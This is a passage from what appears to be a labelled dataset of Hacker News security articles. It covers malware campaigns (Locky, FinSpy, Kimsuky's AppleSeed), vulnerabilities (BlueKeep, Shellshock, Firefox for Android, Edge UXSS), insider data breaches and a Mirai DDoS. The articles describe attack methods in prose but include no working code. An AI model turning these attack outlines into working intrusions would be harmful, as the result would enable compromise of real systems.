app and grant only those permissions that are relevant for the app's purpose. For more technical detail about the Trojan Dropper malware found in CamScanner and a full list of its indicators of compromise (IOCs) including MD5 hashes and its command and control server domains, you can head on to Kaspersky's report. ",Malware 20 Million Credit Cards stolen in South Korea; 40% Population affected by the Data Leak,https://thehackernews.com/2014/01/bank-data-and-credit-card-details-of-20.html,"Since all threats to data security and privacy often come from outside, but internal threats are comparatively more dangerous and a difficult new dimension to the data loss prevention challenge i.e. Data Breach. The ""Insider threats"" have the potential to cause greater financial losses than attacks that originate outside the company. This is what happened recently with three credit card firms in South Korea, where the financial and personal data belonging to users of at least 20 million, in a country of 50 million, was stolen by an employee, who worked as a temporary consultant at Korean Credit Bureau (KCB). ""Confidential data of customers ranging from the minister-level officials to celebrities, including their phone numbers, addresses, credit card numbers, and even some banking records, have been leaked from Kookmin Bank, Shinhan Bank and several other commercial banks"", The stolen data includes the bank account numbers, customers' names, social security numbers, phone numbers, credit card numbers and expiration dates, according to the estimate by the Financial Supervisory Service (FSS). The arrested employee behind the theft, later sold the data to phone marketing companies, whose managers were also arrested earlier this month. ""The credit card firms will cover any financial losses caused to their customers due to the latest accident,"" the FSS said and assured that the Regulators have launched investigations into security measures at the affected firms. ""Their parent firms seem to be taking a step back (from the issue) and not showing any responsible attitude, We will hold them fully responsible for the data leak if their sharing of client data among affiliates and internal control turn out to be the cause."" Now this is not the first time when a company is facing data breach because of Insider Threat, last month an employee of Citibank Korea was arrested for stealing the personal data of 34,000 customers. In 2012, two South Korean hackers were arrested for data from 8.7 million customers in the nation's second-biggest mobile operator. ",Data_Breaches First Cyber Attack 'Mass Exploiting' BlueKeep RDP Flaw Spotted in the Wild,https://thehackernews.com/2019/11/bluekeep-rdp-vulnerability.html,"Cybersecurity researchers have spotted a new cyberattack that is believed to be the very first but an amateur attempt to weaponize the infamous BlueKeep RDP vulnerability in the wild to mass compromise vulnerable systems for cryptocurrency mining. In May this year, Microsoft released a patch for a highly-critical remote code execution flaw, dubbed BlueKeep, in its Windows Remote Desktop Services that could be exploited remotely to take full control over vulnerable systems just by sending specially crafted requests over RDP. BlueKeep, tracked as CVE-2019-0708, is a wormable vulnerability because it can be weaponized by potential malware to propagate itself from one vulnerable computer to another automatically without requiring victims' interaction. BlueKeep has been considered to be such a serious threat that since its discovery, Microsoft and even government agencies [NSA and GCHQ] had continuously been encouraging Windows users and admins to apply security patches before hackers gain hold onto their systems. Even many security firms and individual cybersecurity researchers who successfully developed a fully working exploit for BlueKeep pledged not to release it to the public for a greater good—especially because nearly 1 million systems were found vulnerable even a month after patches were released. This is why amateur hackers took almost six months to come up with a BlueKeep exploit that is still unreliable and doesn't even have a wormable component. BlueKeep Exploit Spreads Cryptocurrency Malware The BlueKeep exploitation in the wild was first speculated by Kevin Beaumont on Saturday when his multiple EternalPot RDP honeypot systems got crashed and rebooted suddenly. Marcus Hutchins, the researcher who helped stop the WannaCry ransomware outbreak in 2017, then analysed the crash dumps shared by Beaumont and confirmed ""BlueKeep artifacts in memory and shellcode to drop a Monero Miner."" In a blog post published today, Hutchins said, ""Finally, we confirm this segment [in crash dump] points to executable shellcode. At this point, we can assert valid BlueKeep exploit attempts in the wild, with shellcode that even matches that of the shellcode in the BlueKeep Metasploit module!"" The exploit contains encoded PowerShell commands as the initial payload, which then eventually downloads the final malicious executable binary from a remote attacker-controlled server and executes it on the targeted systems. According to Google's VirusTotal malware scanning service, the malicious binary is cryptocurrency malware that mines Monero (XMR) using the computing power of infected systems to generate revenue for attackers. But It's Not Wormable Attack! Hutchins also confirmed that the malware spread by this BlueKeep exploit doesn't contain any self-spreading capabilities to jump unassisted from one computer to another. Instead, it appears that the unknown attackers are first scanning the Internet to find vulnerable systems and then exploiting them. In other words, without a wormable component, the attackers would be able to only compromise vulnerable systems that are directly connected to the Internet, but not those that are internally-connected and reachable from them. Though sophisticated hackers might have already been exploiting the BlueKeep flaw to stealthy compromise targeted victims, fortunately, the flaw has not yet been exploited at a larger scale, like WannaCry or NotPetya wormable attacks, as speculated initially. However, at the time of writing, it's unclear how many BlueKeep vulnerable Windows systems have been compromised in the latest cyberattacks to deploy the Monero miner in the wild. To protect yourself? Let me try this again—Go and fix the goddamn vulnerability if you are or your organisation is still using BlueKeep vulnerable Windows systems. If fixing the vulnerability in your organisation is not possible anytime sooner, then you can take these mitigations: Disable RDP services, if not required. Block port 3389 using a firewall or make it accessible only over a private VPN. Enable Network Level Authentication (NLA) – this is partial mitigation to prevent any unauthenticated attacker from exploiting this Wormable flaw. ",Cyber_Attack The Bash Vulnerability: How to Protect your Environment,https://thehackernews.com/2014/10/the-bash-vulnerability-how-to-protect_23.html,"A recently discovered hole in the security of the Bourne-Again Shell (bash) has the majority of Unix/Linux (including OS X) admins sweating bullets. You should be, too--attackers have already developed exploits to unleash on unpatched web servers, network services and daemons that use shell scripts with environment variables (this can include network equipment, industrial devices, etc.) Jaime Blasco, AlienVault Labs Director, gives a good explanation of the exploit in this blog post. And, the video below gives you a quick overview of how AlienVault Unified Security Management (USM) can detect malicious traffic on your network trying to locate and exploit this vulnerability. Basically, this vulnerability allows an attacker to execute shell commands on a server due to an issue in how bash interprets environment variables (such as ""cookie"", ""host"", ""referrer""). Exploiting this allows an attacker to run shell commands directly. Once they have access to run shell commands, they own the server. What can I do? If you're already sanitizing inputs across your web applications to protect against SQL injection and cross-site scripting, you're on the right track. This will give you at least a basic defense. While CGI is still around on most sites, it is usually restricted to little bits of code that have been around for years. These bits of code have probably not updated under the rule-of-thumb ""If it ain't broke, don't fix it."" Well – guess what? It's broke. Fix it. It's time to find an alternative. But, in the mean time, it's a good idea to disable any CGI that calls on the shell. Some have recommended using something other than bash in your applications (Dash, Fish, Zsh, Csh, etc) but be sure to put some thought and careful planning into that instead of a knee-jerk 'rip and replace'. Certain shells might work differently or even be missing some of the bash functionality that your applications rely on, rendering them inoperable. The real fix is going to be patching of bash itself, either from the developers of the distribution you use, or, (if you're savvy) via your own compiled code. Until then, the steps mentioned above are good first steps to defending yourself. How can AlienVault help? AlienVault Unified Security Management (USM) provides asset discovery, vulnerability assessment, threat detection (IDS), behavioral monitoring and SIEM in a single console, giving you everything you need to detect vulnerabilities like Bash, and attempted exploits. With AlienVault USM you can: Discover and inventory your network assets automatically Scan for thousands of vulnerabilities, including Bash Detect attacks and activity with known malicious hosts Prioritize risks with correlated vulnerability and threat data Benefit from threat intelligence updates developed by security experts at AlienVault Labs Within 24 hours of the discovery of the Bash vulnerability, the AlienVault Labs team pushed updated network signatures and correlation directives to the USM platform, enabling users to detect the vulnerability in their environment, and detect attackers attempting to exploit it. Learn more about AlienVault USM: Download a free 30-day trial Watch a demo on-demand Play with USM in our product sandbox (no download required) Attend our webcast ""The Bash Vulnerability: Practical Steps to Protect your Environment"" ",Vulnerability Apple's Developer Center Offline for 32 Hours; Compromised ?,https://thehackernews.com/2013/07/apples-developer-center-offline-for-32.html,"It's been over a day now since Apple's online Dev Center went offline, and latest message can be seen in the screenshot, which explains that the current maintenance has took a lot longer than they expected. ""We apologize that maintenance is taking longer than expected. If your program membership was set to expire during this period, it has been extended and your app will remain on the App Store. If you have any other concerns about your account, please contact us. Thank you for your patience."" message said. Since that time, developers have been unable to access the site and cannot visit the forums or download Mac or iOS SDKs, the iOS 7 beta, or the Mavericks beta. It was first seemed like Apple having some backend issues but according to tweets from many developers, they have received a message from Apple that an attempt was made to reset their user ID's password. Such notices pointing that Apple's Developer Center website may have been compromised. But if it is a security issue, there still remain unanswered questions over what happened. This is not a problem if you have no need to visit your Apple developer account, but for those of you that want to add another iPhone or iOS device to your account, it is a real problem. Possibly that iOS 7 beta 4 download will arrive right around the time of the Dev Center return. Update (Monday) : Apple has published a statement claiming that an intruder attempted to steal the details of registered developers from the company's developer website. A UK based security researcher, Ibrahim Balic claims that he reported 13 Vulnerabilities in Apple system, highlighting a hole that could left data from the Developer Center exposed. For proof of concept, he demonstrated the hack on his own 73 employees while reporting to Apple security team. Though he admits that he was able to hack more than 100,000 users, but he did not hack the system for malicious purposes. Security researcher is not happy with Apple's Statement, that cited an attempted security breach as the reason for the developer site outage. ",Vulnerability Malicious Gaming App Infects More than 1 Million Android Users,https://thehackernews.com/2015/07/android-malware-game.html,"It's not at all surprising that the Google Play Store is surrounded by a number of malicious applications that may gain users' attention to fall victim for one, but this time it might be even worse than you thought. Threat researchers from security firm ESET have discovered a malicious Facebook-Credentials-Stealing Trojan masquerading as an Android game that has been downloaded by more than a Million Android users. Malicious Android Apps downloaded 50,000-1,000,000 times The Android game, dubbed ""Cowboy Adventure,"" and another malicious game, dubbed ""Jump Chess"" – downloaded up to 50,000 times, have since been removed from Google Play Store. However, before taking them off from the app store, the creepy game apps may have compromised an unknown number of victims' Facebook credentials. Both the games were created by the same software developer, Tinker Studio and both were used to gather social media credentials from unsuspecting users. How Cowboy Adventure victimizes Android users? Once installed, Cowboy Adventure produced a fake Facebook login window that prompted users to enter their Facebook usernames along with their passwords. A practice known as OAuth in which a 3rd party asks your Facebook login. However, if users provide their credentials to Cowboy Adventure app, the malicious code within the game app allegedly sent their credentials to the attacker's server. Therefore, If you have downloaded Cowboy Adventure or Jump Chess, you should immediately change not alone your Facebook password, but any service that uses the same combination of username and password as your Facebook account. ESET senior security researcher Robert Lipovsky believes that the app malicious behavior is not just a careless mistake of the game developer, but the developer is actually a criminal minded. Take Away A few basic tips that you should always keep in your mind are: Always download apps from official sources, such as Google Play Store or Apple's App Store. Read reviews from other users before downloading an app (Many users complained about ""Cowboy Adventure"" that the game locked them out of Facebook accounts). Always use two-factor authentication on services that makes it harder for hackers to access your accounts with just your password. Always keep a malware scanning software from trusted vendors like Avast, AVG, ESET, Kaspersky and Bitdefender, on your smartphone. ",Malware Russian Arrested After Offering $1 Million to U.S. Company Employee for Planting Malware,https://thehackernews.com/2020/08/russian-extortion-malware.html,"Hackers always find a way in, even if there's no software vulnerability to exploit. The FBI has arrested a Russian national who recently traveled to the United States and offered $1 million in bribe to an employee of a targeted company for his help in installing malware into the company's computer network manually. Egor Igorevich Kriuchkov, 27-year-old, entered the United States as a tourist and was arrested in Los Angeles after meeting with the unnamed employee of an undisclosed Nevada-based company numerous times, between August 1 to August 21, to discuss the conspiracy. ""On or about July 16, EGOR IGOREVICH KRIUCHKOV used his WhatsApp account to contact the employee of victim company and arranged to visit in person in the District of Nevada,"" the court documents say. ""On or about July 28, EGOR IGOREVICH KRIUCHKOV entered the United States using his Russian Passport and a B1/B2 tourist visa."" Kriuchkov also asked the employee to participate in developing tailored malware by sharing information about the company's infrastructure. According to court documents released by the US Justice Department, the malicious software Kriuchkov asked to install aims to extract data from the company's network, allowing attackers to threaten it later to make the information public unless it pays a ransom. Kriuchkov and his co-conspirators in Russia promised the employee to pay $1 million in Bitcoins after successfully planting the said malware and offered to launch a DDoS attack on the company's network to divert attention from the malware. ""If CHS1 [employee] agreed to this arrangement, the group would provide the malware to CHS1 [employee] in either a thumb drive to be inserted into a computer's USB drive or an email with an attachment containing malware."" ""The unidentified co-conspirator discussed various means by which to pay the employee, including payments using cryptocurrency, a guarantor security deposit, or cash."" ""After being contacted by the FBI, Kriuchkov drove overnight from Reno, Nevada, to Los Angeles. Kriuchkov asked an acquaintance to purchase an airline ticket for him in an attempt to fly out of the country,"" the United States agencies say. After getting arrested by the FBI, who was conducting physical surveillance of Kriuchkov and his meetings, he listed prior companies the gang had targeted and also revealed that each of these targeted companies had a person working at those companies who installed malware on behalf of the gang. To be noted, it's quite possible that a few high-profile ransomware and data breach attacks might have been executing in the same way by conspiring with the insiders. Kriuchkov has been charged with one count of conspiracy to cause damage to a protected computer intentionally. ",Cyber_Attack Microsoft Edge Bug Could've Let Hackers Steal Your Secrets for Any Site,https://thehackernews.com/2021/06/microsoft-edge-bug-couldve-let-hackers.html,"Microsoft last week rolled out updates for the Edge browser with fixes for two security issues, one of which concerns a security bypass vulnerability that could be exploited to inject and execute arbitrary code in the context of any website. Tracked as CVE-2021-34506 (CVSS score: 5.4), the weakness stems from a universal cross-site scripting (UXSS) issue that's triggered when automatically translating web pages using the browser's built-in feature via Microsoft Translator. Credited for discovering and reporting CVE-2021-34506 are Ignacio Laurence as well as Vansh Devgan and Shivam Kumar Singh with CyberXplore Private Limited. ""Unlike the common XSS attacks, UXSS is a type of attack that exploits client-side vulnerabilities in the browser or browser extensions in order to generate an XSS condition, and execute malicious code,"" CyberXplore researchers said in a write-up shared with The Hacker News. ""When such vulnerabilities are found and exploited, the behavior of the browser is affected and its security features may be bypassed or disabled."" Specifically, the researchers found that the translation feature had a piece of vulnerable code that failed to sanitize input, thus allowing an attacker to potentially insert malicious JavaScript code anywhere in the webpage that's then subsequently executed when the user clicks the prompt on the address bar to translate the page. As a proof-of-concept (PoC) exploit, the researchers demonstrated it was possible to trigger the attack simply by adding a comment to a YouTube video, which is written in a language other than English, along with an XSS payload. In a similar vein, a friend request from a Facebook profile containing other language content and the XSS payload was found to execute the code as soon as the recipient of the request checked out the user's profile. Following responsible disclosure on June 3, Microsoft fixed the issue on June 24, in addition to awarding the researchers $20,000 as part of its bug bounty program. The latest update (version 91.0.864.59) to the Chromium-based browser can be downloaded by visiting Settings and more > About Microsoft Edge (edge://settings/help). ",Vulnerability How Just Opening an MS Word Doc Can Hijack Every File On Your System,https://thehackernews.com/2016/02/locky-ransomware-decrypt.html,"If you receive a mail masquerading as a company's invoice and containing a Microsoft Word file, think twice before clicking on it. Doing so could cripple your system and could lead to a catastrophic destruction. Hackers are believed to be carrying out social engineering hoaxes by adopting eye-catching subjects in the spam emails and compromised websites to lure the victims into installing a deadly ransomware, dubbed ""Locky,"" into their systems. So if you find .locky extension files on your network shares, Congratulations! You are infected and left with just two solutions: Rebuild your PC from scratch or Pay the ransom. Locky ransomware is spreading at the rate of 4000 new infections per hour, which means approximately 100,000 new infections per day. Microsoft MACROS are Back It is hard to digest the fact that, in this 2016, even a single MS Word document could compromise your system by enabling 'Macros.' This is where the point to appreciate hacker's sheer brilliance of tactics. Locky ransomware is being distributed via Microsoft 365 or Outlook in the form of an Invoice email attachment (Word File that embeds vicious macro functions). The concept of macros dates back to 1990s. You must be familiar with this message: ""Warning: This document contains macros."" Now macros are back, as cyber criminals discover a new way to get internet users to open Microsoft Office documents, especially Word files that allow macros to run automatically. How Does Locky Work? Once a user opens a malicious Word document, the doc file gets downloaded to its system. However, danger comes in when the user opens the file and found the content scrambled and a popup that states ""enable macros"". Here comes the bad part: Once the victim enables the macro (malicious), he/she would download an executable from a remote server and run it. This executable is nothing but the Locky Ransomware that, when started, will begin to encrypt all the files on your computer as well as network. Locky ransomware affects nearly all file formats and encrypts all the files and replace the filename with .locky extension. Once encrypted, the ransomware malware displays a message that instructs infected victims to download TOR and visit the attacker's website for further instructions and payments. Locky ransomware asks victims to pay between 0.5 and 2 Bitcoins ($208 to $800) in order to get the decryption key. One of the interesting note on Locky is that it is being translated into many languages, which heighten its attack beyond English boundaries to maximize the digital casualties. Locky Encrypts Even Your Network-Based Backup Files The new ransomware also has the capability to encrypt your network-based backup files. So it's time for you to keep you sensitive and important files in a third party storage as a backup plan in order to evade future-ransomware infections. A researcher named Kevin Beaumont initially discovered the existence of Locky encrypted virus. To check the impact of Locky, Kevin successfully intercepted the Locky traffic yesterday and realized that the cryptovirus is spreading out rapidly in the wild. ""I estimate by the end of the day well over 100,000 new endpoints will be infected with Locky, making this a genuine major cybersecurity incident — 3 days in, approximately a quarter of Million PCs will be infected,"" Kevin said in a blog post. One hour of infection Statistics: Among the highly impacted countries include Germany, Netherlands, United States, Croatia, Mali, Saudi Arabia, Mexico, Poland, Argentina and Serbia. ",Malware 17-Year-Old Found Bugs in WhatsApp Web and Mobile App,https://thehackernews.com/2015/01/whatsapp-web-mobile-app.html,"Last week, the most popular mobile messaging application WhatsApp finally arrived on the web — dubbed WhatsApp Web, but unfortunately it needs some improvements in its web version. An independent 17-year-old security researcher Indrajeet Bhuyan reported two security holes in the WhatsApp web client that in some way exposes its users' privacy. Bhuyan called the first hole, WhatsApp photo privacy bug and the other WhatsApp Web Photo Sync Bug. Bhuyan is the same security researcher who reported us the vulnerability in the widely popular mobile messaging app which allowed anyone to remotely crash WhatsApp by sending a specially crafted message of just 2kb in size, resulting in the loss of conversations. Whatsapp Photo Privacy Bug According to him, the new version of WhatsApp Web allows us to view a user's profile image even if we are not on the contact list of that user. Even if the user has set the profile image privacy setting to ""Contacts Only,"" the profile picture can be viewed by out of contacts people as well. Basically, if we set the profile image privacy to Contacts Only, only the people in our contact list are able to view our profile picture, and nobody else. But, this is not in the case of WhatsApp Web. You can watch how this works in the video demonstration below: WhatsApp Web Photo Sync Bug The second security hole points out the WhatsApp Web Photo Syncing functionality. Bhuyan noticed that whenever a user deletes a photo that was sent via the mobile version of WhatsApp application, the photo appears blurred and can't be viewed. However, the same photo, which has already been deleted by the user from mobile WhatsApp version, can be accessible by Whatsapp Web as the photo does not get deleted from its web client, revealing the fact that mobile and web clients of the service are not synced properly. You can also watch the video demonstration on this as well: This is no surprise, as WhatsApp Web introduced just a couple of days before and these small security and implementation flaws could be expected at this time, as well as some other bugs could also be revealed in the near future. However, the company will surely fix the issues and will definitely make its users' messaging experience secure. As partnered with Open Whisper Systems, WhatsApp recently made end-to-end encryption a default feature on Android platform, stepping a way forward for the online privacy of its users around the world. ",Vulnerability Powerful FinSpy Spyware Found Targeting iOS and Android Users in Myanmar,https://thehackernews.com/2019/07/finspy-spyware-android-ios.html,"One of the most powerful, infamous, and advanced piece of government-grade commercial surveillance spyware dubbed FinSpy—also known as FinFisher—has been discovered in the wild targeting users in Myanmar. Created by German company Gamma International, FinSpy is spying software that can target various mobile platforms including iOS and Android, we well as desktop operating systems. Gamma Group reportedly sells its controversial FinSpy espionage tool exclusively to government agencies across the world, but also gained notoriety for targeting human rights activists in many countries. The FinSpy implant is capable of stealing an extensive amount of personal information from targeted mobile devices, such as SMS/MMS messages, phone call recordings, emails, contacts, pictures, files, and GPS location data. In its latest report published today, Kaspersky researchers revealed a cyber-espionage campaign that involves targeting Myanmar users with the latest versions of FinSpy implants for iOS and Android. Since some advanced functionalities require FinSpy to have root privileges on a targeted device, the implant doesn't work properly on iOS without jailbreaking, which can be achieved with physical access or remotely in combination with some zero-day vulnerabilities. However, in the case of Android, researchers found that the implant has been using the DirtyCow exploit to automatically gain root privileges on an unrooted Android device, allowing attackers to successfully infect a device remotely. According to the researchers, the new versions of FinSpy for both mobile operating systems are also capable of recording VoIP calls via external apps such as Skype, WeChat, Viber, LINE, as well as via secure messaging apps such as WhatsApp, Threema, Signal, and Telegram. ""The module .chext targets messenger applications and hooks their functions to exfiltrate almost all accessible data: message content, photos, geolocation, contacts, group names, and so on. The collected data is submitted to the local server deployed by the main module,"" the researchers say. FinSpy also includes keylogging functionality and has also been designed to cover up the tracks of its activities on a targeted device. ""Since the leak in 2014, Gamma Group has recreated significant parts of its implants, extended supported functionality (for example, the list of supported instant messengers has been significantly expanded) and at the same time improved encryption and obfuscation (making it harder to analyze and detect implants), which made it possible to retain its position in the market,"" the researchers conclude. While conducting their research, Kaspersky researchers detected the updated versions of the FinSpy implants used in the wild in almost 20 countries, but ""assuming the size of Gamma's customer base; it's likely that the real number of victims is much higher."" Gamma is continuously working on the updates for the FinSpy malware, as researchers have found another version of the threat at the time of publishing their report, and they are currently investigating the sample. ",Malware Multiple Vulnerabilities in Firefox for Android Leak Sensitive Information,https://thehackernews.com/2014/03/multiple-vulnerabilities-in-firefox-for.html,"The Android operating system has hardened its security with application Sandboxing features to ensure that no application can access sensitive information held by another without proper privileges. Android applications communicate with each other through Intents and these intents can be abused by hackers to provide a channel for a malicious application to inject malicious data into a target, potentially vulnerable application. Security Researchers at IBM have discovered multiple vulnerabilities in Firefox for Android platform that allow a malicious application to leak the sensitive information related to the user's profile. Android's Firefox app stores the personal data at following location: /data/data/org.mozilla.firefox/files/mozilla/.default. Where the random name for user's profile is used to prevent unwanted access to this directory in case of Firefox exploitation. Researchers developed an exploit to brute-force the Firefox profile directory name in a practical amount of time CVE-2014-1516) and successfully bypassed Android's sandbox to obtain the sensitive data reside in that directory, including users' cookies, browsing history and cache information. For successful exploitation, an attacker can create a specially crafted HTML file, that will force Firefox to load the files including inside the user profile directory using an Intent. The JavaScript code in the HTML file will download any file under the user profile directory by creating an iframe, using the vulnerability dubbed as CVE-2014-1515 (explained below). Downloaded files with the exploit code will be saved automatically to the SD card at location /mnt/sdcard/Download, that can be read by the attacker using any malicious Android app. REPORTED VULNERABITIES 1.) Profile Directory Name Weak Randomization (CVE-2014-1516) - The Attacker who knows the seed of the Pseudo-Random Number Generator (PRNG) can easily predict its output and eventually the generated Firefox Profile name. 2.) Profile Directory Name Leaks to Android System Log (CVE-2014-1484) - Android operating system writes the randomly generated Firefox user's Profile Directory Name in the Android System Log (logcat) at various locations, that can be used to steal private information. In Android version 4.0 and below, installed apps with READ_LOGS permission can easily read Android system logs to identify the name of the Firefox user profile folder. 3.) Automatic File Download to SD Card (CVE-2014-1515) - Firefox for Android will download any file automatically to the SD card, if not of any known extension. Malicious apps with READ_EXTERNAL_STORAGE permission can read files from the SD card to extract non-renderable data such as the cookies database. 4.) Crash Reporter File Manipulation (CVE-2014-1506) - In cases where the application crashes, Firefox sends the crash dumps located in /data/data/org.mozilla.firefox/files/mozilla/Crash Reports/pending on the device file system. Using the exploit, an attacker can manipulate the crash report file path to the Android Log file in order to steal it. Researchers have also explained second way to hack user data using this vulnerability. RESEARCH PAPER: Researchers have already reported these vulnerabilities to the Mozilla and three out of four are already been patched in the latest versions. Android users with Firefox installed in the device are advised to upgrade it to Mozilla Firefox 28.0 or later from the Google Play app store. ",Vulnerability Researchers Uncover Hacking Operations Targeting Government Entities in South Korea,https://thehackernews.com/2021/06/researchers-uncover-hacking-operations.html,"A North Korean threat actor active since 2012 has been behind a new espionage campaign targeting high-profile government officials associated with its southern counterpart to install an Android and Windows backdoor for collecting sensitive information. Cybersecurity firm Malwarebytes attributed the activity to a threat actor tracked as Kimsuky, with the targeted entities comprising of the Ministry of Foreign Affairs, Ambassador of the Embassy of Sri Lanka to the State, International Atomic Energy Agency (IAEA) Nuclear Security Officer, and the Deputy Consul General at Korean Consulate General in Hong Kong. The attacks also involved collecting information about other organizations and universities in the country, including the Korea Internet and Security Agency (KISA), Seoul National University, and Daishin Securities. Malwarebytes, however, noted that there is no evidence of active targeting or compromise by the adversary. The development is only the latest in a series of surveillance efforts aimed at South Korea. Believed to be operating on behalf of the North Korean regime, Kimsuky (aka Velvet Chollima, Black Banshee, and Thallium) has a track record of singling out South Korean entities while expanding their victimology to the U.S., Russia, and various nations in Europe. Last November, the adversary was linked to a new modular spyware suite called ""KGH_SPY,"" which allows it to carry out reconnaissance of target networks, log keystrokes, and steal confidential information, as well as a stealthy malware under the name ""CSPY Downloader"" that's designed to thwart analysis and download additional payloads. Kimsuky's attack infrastructure consists of various phishing websites that mimic well known websites such as Gmail, Microsoft Outlook, and Telegram with an aim to trick victims into entering their credentials. ""This is one of the main methods used by this actor to collect email addresses that later will be used to send spear-phishing emails,"" Malwarebytes researcher Hossein Jazi said. In using social engineering as a core component of its operations, the goal is to distribute a malware dropper that takes the form of a ZIP archive file attached to the emails, which ultimately leads to the deployment of an encoded DLL payload called AppleSeed, a backdoor that's been put to use by Kimsuky as early as 2019. ""Besides using the AppleSeed backdoor to target Windows users, the actor also has used an Android backdoor to target Android users,"" Jazi noted. ""The Android backdoor can be considered as the mobile variant of the AppleSeed backdoor. It uses the same command patterns as the Windows one. Also, both Android and Windows backdoors have used the same infrastructure."" AppleSeed has all the hallmarks of a typical backdoor, with myriad capabilities to record keystrokes, capture screenshots, collect documents with specific extensions (.txt, .ppt, .hwp, .pdf, and .doc), and gather data from removable media devices connected to the machine, all of which are then uploaded to a remote command-and-control server. But perhaps the most interesting discovery of all is that the threat actor calls themselves Thallium in the malware source code, which is the moniker assigned by Microsoft based on its tradition of naming nation-state hacking groups after chemical elements. ",Malware Facebook Sued Hong Kong Firm for Hacking Users and Ad Fraud Scheme,https://thehackernews.com/2019/12/facebook-account-hacking.html,"Following its efforts to take legal action against those misusing its social media platform, Facebook has now filed a new lawsuit against a Hong Kong-based advertising company and two Chinese individuals for allegedly abusing its ad platform to distribute malware and Ad fraud. Facebook filed the lawsuit on Thursday in the Northern District of California against ILikeAd Media International Company Ltd. as well as a Chinese software developer and a marketing director working for the firm, Chen Xiao Cong and Huang Tao. All three defendants have been alleged to have deceived people into installing malware on their systems, enabling them to compromise user's Facebook accounts and then using those hacked accounts to advertise counterfeit goods and diet pills—which is clearly in violation of Facebook's Terms and Advertising Policies. ""The suit seeks to hold accountable ILikeAd Media International Company Ltd. and Chen Xiao Cong and Huang Tao for creating the malware, tricking people into installing it, compromising people's Facebook accounts and then using people's accounts to run deceptive ads,"" Facebook said in a blog post today when announcing the lawsuit. According to the social media giant, the defendants made use of improper practices such as ""celeb bait"" and ""cloaking"" to bait Facebook users into downloading and installing malware that eventually compromised their Facebook accounts. While 'cloaking' involves deliberately disguising the true destination of a link in the ad by displaying one version of the ad's landing page to Facebook and another version to Facebook users, 'celeb bait' involves misusing celebrities photos in ads to entice users to click on them. ""Cloaking schemes are often sophisticated and well organized, making the individuals and organizations behind them difficult to identify and hold accountable. As a result, there have not been many legal actions of this kind,"" Facebook said. Since April, Facebook has notified hundreds of thousands of users that their accounts may have been compromised and instructing them to change their passwords, according to the complaint. Facebook also said the social media company had issued more than $4 million in refunds to victims whose Facebook accounts were used to run unauthorized ads and also helped to secure their accounts compromised in this malicious advertisement scheme. This is the latest lawsuit that Facebook filed in a federal court against entities and individuals abusing its properties for malicious intent. Just over a month ago, Facebook sued surveillance vendor NSO Group for allegedly hacking 1,400 mobile devices by misusing the company's secure messaging platform, WhatsApp. In August this year, Facebook also filed a lawsuit against two shady Android app developers, Hong Kong-based 'LionMobi' and Singapore-based 'JediMobi,' for allegedly running a ""click injection fraud"" scheme that programmed bots to click on Facebook ads. In March this year, Facebook also took two Ukrainian men into the courts for allegedly using quiz apps on the platform to distribute malware that steals Facebook users' data. ",Malware Millions of PCs Found Running Outdated Versions of Popular Software,https://thehackernews.com/2019/01/software-vulnerabilities-hacking.html,"It is 2019, and millions of computers still either have at least one outdated application installed or run outdated operating systems, making themselves vulnerable to online threats and known security vulnerabilities/exploits. Security vendor Avast has released its PC Trends Report 2019 revealing that millions of users are making themselves vulnerable to cyber attacks by keeping outdated versions of popular applications on their computers. Probably the most overlooked vectors for any cyber attack is out-of-date programs, which most of the times, is the result of the users' laziness and company's administrators ignoring the security updates in a business environment as they can't afford the downtime. According to the report [PDF], Adobe Shockwave tops the list of software that most user left outdated on their PCs, followed by VLC Media Player, Skype, Java Runtime Environment , 7-Zip File Manager, and Foxit Reader. The outdated software applications often provide an open door for hackers and cybercriminals to take advantage of security bugs and loopholes in the programs, making them a potential target of cyber attacks. However, it is not only applications but also operating systems that are out of date. Almost 15% of all Windows 7 computers and 9% of all Windows 10 computers are running an outdated version of the operating systems. To understand the risk, there could be no better example than the Global WannaCry menace that largely infected networks that used out-of-date operating systems, like Windows XP, for which Microsoft no longer offers technical support. WannaCry was taking advantage of a dangerous security hole in Microsoft Windows that had already been fixed by the company months before the ransomware threat strikes the whole world. ""Most of us replace our smartphone regularly, but the same cannot be said for our PCs. With the average age of a PC now reaching six years old, we need to be doing more to ensure our devices are not putting us at unnecessary risk,"" said Avast President Ondrej Vlcek. ""With the right amount of care, such as cleaning our hardware's insides using cleaners, optimization and security products, PCs will be safe and reliable for even longer."" The bottom line: Keeping your operating systems and software applications patched and up-to-date can protect you from cyber attacks and prevent hackers from taking advantage of your vulnerable machine to steal your personal and sensitive data. ",Vulnerability DDoS Attack Takes Down Central Heating System Amidst Winter In Finland,https://thehackernews.com/2016/11/heating-system-hacked.html,"Just Imaging — What if, you enter into your home from a chilling weather outside, and the heating system fails to work because of a cyber attack, leaving you in the sense of panic? The same happened late last month when an attack knocks heating system offline in Finland. Last week, a Distributed Denial of Service (DDoS) attack led to the disruption of the heating systems for at least two housing blocks in the city of Lappeenranta, literally leaving their residents in subzero weather. Both the apartments are managed by a company called Valtia, a facilities services company headquartered in Lappeenranta. Valtia CEO Simo Rounela confirmed to English language news outlet Metropolitan.fi that the central heating system and hot water system in both buildings had become a target of DDoS attacks. In an attempt to fight back the cyber attacks, which lived for a short time, the automated systems rebooted — and unfortunately got stuck in an endless loop, which restarted repeatedly and eventually shut down heating systems for more than a week. Also Read: Someone is Using Mirai Botnet to Shut Down Internet for an Entire Country. The incident is extremely worrying because in a location as cold as Finland – where temperatures at this time month are below freezing – taking heating systems offline for over a week could result in death, particularly with old-aged people. Fortunately for the buildings' residents, it was not that cold in Lappeenranta. The attack started in late October and ended on 3rd November afternoon. Here's what a brief post on the company's website reads: ""Over 90 percent of the [remote systems] in the area of terraced houses or larger buildings will not send an alarm at the moment, even if the heat is switched off or radiator pressure disappears,"" as the systems are designed to shut down for safety. ""The systems must be actively monitored and adjusted."" According to another local media outlet, Helsingin Sanomat, Valtia quickly relocated those affected systems and switched the heating systems over to manual, while the company addressed the DDoS attacks and brought the control systems ""back into the grid, this time from behind a firewall."" The report attributes the cyber attack to the Mirai botnet – the same infamous IoT botnet that caused vast internet outage over two weeks ago by launching massive DDoS attacks against DNS provider Dyn. Dangerous Threats of Massive IoT Botnets Mirai botnet malware scans for insecure IoT devices, like security cameras, DVRs, and routers, that uses their default passwords and then enslaves them into a botnet network, which is then used to launch DDoS attacks. The latest incident isn't a disastrous situation, but it is enough to make it crystal clear that these Internet-connected systems can cause a significant consequence in our physical world as well. Just imagine if these control systems can not be manually adjusted by the people who truly rely on them? In this case, any cyber attack that knocks these systems down is potentially dangerous and even deadly in the event of extreme temperatures. 